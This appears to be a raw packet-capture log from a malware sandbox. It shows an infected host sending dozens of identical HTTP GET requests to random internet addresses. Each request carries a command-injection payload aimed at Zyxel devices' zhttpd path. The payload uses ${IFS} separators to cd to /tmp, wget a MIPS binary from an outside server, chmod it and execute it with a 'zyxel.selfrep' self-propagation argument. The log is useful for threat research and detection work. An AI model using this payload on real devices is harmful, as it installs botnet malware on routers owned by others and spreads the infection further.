                                    Jan 13, 2024 19:02:35.210962057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4678192.168.2.1342030109.38.213.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211023092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4679192.168.2.133365457.204.201.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211088896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4680192.168.2.135527042.231.228.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211154938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4681192.168.2.1348808180.201.188.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211241007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4682192.168.2.133413439.37.186.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211302042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4683192.168.2.133507853.76.20.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211391926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4684192.168.2.133625673.79.105.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211440086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4685192.168.2.134101486.243.140.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211535931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4686192.168.2.1347278143.39.12.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211582899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4687192.168.2.135921641.211.199.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211656094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4688192.168.2.1351126198.41.48.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211734056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4689192.168.2.1345752210.88.207.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211806059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4690192.168.2.133829813.202.241.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211944103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4691192.168.2.1355612206.157.116.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.211987972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4692192.168.2.1340752161.241.107.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212100029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4693192.168.2.134245635.53.229.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212114096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4694192.168.2.1344882124.239.78.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212167025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4695192.168.2.1358472189.131.121.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212254047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4696192.168.2.133906692.77.224.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212342978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4697192.168.2.1353798197.146.30.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212408066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4698192.168.2.1347330134.171.234.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212481976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4699192.168.2.1340426141.44.174.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212548018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4700192.168.2.135493072.172.100.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212619066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4701192.168.2.1338112177.134.60.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212665081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4702192.168.2.13334342.47.211.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212726116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4703192.168.2.1347302104.229.229.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212781906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4704192.168.2.1343650126.104.192.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212877035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4705192.168.2.13575802.136.235.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.212934971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4706192.168.2.135777254.59.14.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213005066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4707192.168.2.135201041.229.220.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213074923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4708192.168.2.134682699.70.64.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213128090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4709192.168.2.1333688206.189.194.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213203907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4710192.168.2.134241496.82.156.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213264942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4711192.168.2.1340030140.167.20.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213342905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4712192.168.2.134490441.161.249.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213395119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4713192.168.2.1359848129.194.197.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213458061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4714192.168.2.134926688.5.62.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213531971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4715192.168.2.1352040160.110.51.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213620901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4716192.168.2.1357224198.159.253.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213710070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4717192.168.2.134676837.238.59.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213769913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4718192.168.2.135013898.210.97.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213848114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4719192.168.2.134373240.186.249.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.213920116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4720192.168.2.134689012.75.89.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214013100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4721192.168.2.1349958123.85.205.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214075089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4722192.168.2.1336936141.199.220.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214129925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4723192.168.2.1334072149.137.243.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214179993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4724192.168.2.134449835.77.241.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214258909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4725192.168.2.1350110173.169.28.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214315891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4726192.168.2.1358620219.30.199.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214402914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4727192.168.2.1354334130.239.143.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214456081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4728192.168.2.1348994118.219.189.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214529037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4729192.168.2.134624879.159.236.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214593887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4730192.168.2.135342437.221.81.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214663029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4731192.168.2.135340241.12.169.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214744091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4732192.168.2.133349224.141.250.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214823008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4733192.168.2.1348170125.13.82.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214874029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4734192.168.2.1352384212.28.67.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.214931011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4735192.168.2.1336652220.244.249.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215003014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4736192.168.2.135351058.46.115.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215065002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4737192.168.2.1357532124.125.178.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215126038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4738192.168.2.1358084110.30.166.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215189934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4739192.168.2.1339232201.107.39.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215241909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4740192.168.2.134755476.33.74.52443
                                    TimestampBytes transferredDirectionData
